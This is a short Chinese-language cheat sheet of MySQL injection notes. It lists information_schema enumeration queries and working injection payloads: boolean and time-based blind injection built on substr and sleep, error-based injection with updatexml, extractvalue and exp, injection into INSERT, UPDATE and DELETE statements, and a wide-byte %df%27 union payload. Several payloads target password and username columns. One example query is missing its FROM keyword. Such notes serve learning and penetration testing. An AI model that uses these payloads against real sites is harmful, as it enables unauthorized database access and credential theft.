MySQL注入笔记

MySQL注入笔记
MySQL基础知识

information_schema //MySQL自带数据表
table_schema //数据库名
table_name //表名
column_name //列名
select table_name information_schema.tables where table_schema=database(); //跑表名
select column_name from information_schema.columns where table_name='admin' //跑列名
select password from admin//跑数据

盲注
运用的一些函数

substr(version(),1,1); //截取 第一字节 开始 数的 第一个字节
if(1=1,sleep(5),1); 如果1=1 那么sleep(5) 否则输出1
ord('a') //acill 97

bool 盲注
形如 ‘=(bool)=’ ,and ‘1’=’1’ , and 1=1

admin'=(select(substr((select(passwd)from(user))from(1)for(1)))=8)='1 //

时间盲注
形如 if(1=1,sleep(5),1)

if(ord((select substr(username,{0},1) from user ))=50,sleep(3) 
select table_name from information_schema.tables where table_schema=database()
select if(ord(substr((select table_name from information_schema.tables where table_schema=database()),0,1))=117,sleep(5),1);
select if(ord(substr((select username from user limit 1),1,1))=108,sleep(5),1);

insert update delect注入 引用

http://blog.csdn.net/ysynhtt/article/details/45115849

insert语句

insert into users (id, username, password) values (2,''injecthere'','Olivia');
insert into users (id, username, password) values (2,""injecthere"",'Olivia');

payload

or updatexml(1,concat(0x7e,(version())),0) or 

insert

INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');

update

UPDATE users SET password='Nicky' or updatexml(2,concat(0x7e,(version())),0) or''WHERE id=2 and username='Olivia';

delete

DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';

报错注入(xpath,updatemal,exp)
XPATH注入
0x7e表示的是“~”符号

+and+extractvalue(rand(),concat(0x7e,version()))-- //报错回显版本号

updatexml报错注入

+and+updatexml(0x7e,concat(0x7e,(version())),0)-- 

exp报错注入

and EXP(~(SELECT * from(select user())a)) 

宽字节注入

?id=-1%df%27union%20select%201,user(),3--+